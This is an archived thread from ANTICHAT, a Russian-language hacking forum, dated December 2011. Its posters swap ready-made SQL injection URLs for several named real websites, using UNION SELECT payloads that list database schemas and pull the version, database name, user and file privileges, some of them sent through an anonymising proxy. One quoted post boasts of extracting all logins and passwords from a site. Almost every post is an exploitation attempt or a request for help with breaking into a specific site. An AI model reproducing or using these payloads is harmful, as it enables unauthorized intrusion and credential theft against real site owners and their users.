ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

14.12.2011, 13:55
|
|
Guest
Сообщений: n/a
Провел на форуме: 107835
Репутация:
23
|
|
Код:
Code:
http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=-317
Cannot get order by.. Any help please?[/QUOTE]
Сообщение от None
http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=-317'+union+/*!select*/+1,2,3,4,(/*!select*/(@x)from(/*!select*/(@x:=0x00),(/*!select*/(null)from(information_schema./*!columns*/)where(table_schema!=0x696e666f726d6174696f6e5f736 368656d61)and(0x00)in(@x:=/*!concat*/(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,c olumn_name))))x),6,7,8,9,10,11,12,13+--+
|
|
|
|

14.12.2011, 22:14
|
|
Познающий
Регистрация: 03.02.2009
Сообщений: 49
Провел на форуме: 3317712
Репутация:
403
|
|
http://pavlodarauto[antiG]ru/info/view.php?id=146
|
|
|

14.12.2011, 22:25
|
|
Новичок
Регистрация: 18.04.2007
Сообщений: 1
Провел на форуме: 2012
Репутация:
0
|
|
Сообщение от _Spamer_
_Spamer_ said:
http://pavlodarauto[antiG]ru/info/view.php?id=146
Сообщение от None
http://pavlodarauto.ru/bd/baraholka_view.php?id=-1+/*!union+select*/+1,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21--
Плюсек мне
|
|
|

14.12.2011, 22:25
|
|
Guest
Сообщений: n/a
Провел на форуме: 107835
Репутация:
23
|
|
Сообщение от _Spamer_
_Spamer_ said:
http://pavlodarauto[antiG]ru/info/view.php?id=146
так можно сделать
Сообщение от None
http://pavlodarauto.ru/info/view.php?id=-146+union+/*!select*/+1,2,3,4,5,6,/*!concat*/(version(),0x3a,database(),0x3a,user()),8,9,10+--+
|
|
|
|

15.12.2011, 13:03
|
|
Guest
Сообщений: n/a
Провел на форуме: 1609
Репутация:
0
|
|
Изучаю такую технологию как buffer overflow и постепенно погружаюсь в кернел хакинг, вопрос: на каком *никс дистрибутиве мне будит удобно писать ядерньки? =\ Остановился на выборе между gentoo & debian .
|
|
|
|

15.12.2011, 19:24
|
|
Guest
Сообщений: n/a
Провел на форуме: 344922
Репутация:
75
|
|
Сообщение от d1v
d1v said:
это если юзер один.
а если юзеров > 1, то
File_Priv from mysql.user where user= 'юзер'
а как тут?
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//anonymouse.org/cgi-bin/anon-www.cgi/http://www.donaticus-him.ru/view_product.php?id=-4%27+union+select+1,2,3,4,file_priv+from+mysql.user--+
[/COLOR][/COLOR]
выводит ошибку
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//anonymouse.org/cgi-bin/anon-www.cgi/http://www.donaticus-him.ru/view_product.php?id=-4%27+union+select+1,2,3,4,file_priv+from+mysql.user+where+user=%27u198287@87%27--+
[/COLOR][/COLOR]
и так тоже ошибка
|
|
|
|

15.12.2011, 19:53
|
|
Guest
Сообщений: n/a
Провел на форуме: 6312
Репутация:
0
|
|
Сообщение от Datax
Datax said:
Еще одна приватная бага ,работает на новых версиях.
Заходим например суда
http://soft.wlok.ru
Делаем запрос
http://soft.wlok.ru/soft/page/99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 999999999999999999/
Цифры девять ,нужно написать слитно.
Видим
Раскручивайте дальше сами, я например вытаскивал все пароли и логины.
Как раскручивать такие скули?
|
|
|
|

15.12.2011, 21:33
|
|
Guest
Сообщений: n/a
Провел на форуме: 4716
Репутация:
0
|
|
Подскажите
|
|
|
|

15.12.2011, 21:34
|
|
Guest
Сообщений: n/a
Провел на форуме: 102354
Репутация:
267
|
|
Крути как обычно =/
http://site/login_login_groovy/1'+...
lansia1 чет не крутится.. Мб не скулья?
|
|
|
|

15.12.2011, 21:36
|
|
Guest
Сообщений: n/a
Провел на форуме: 4716
Репутация:
0
|
|
Ereee
Спасибо,понял)
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|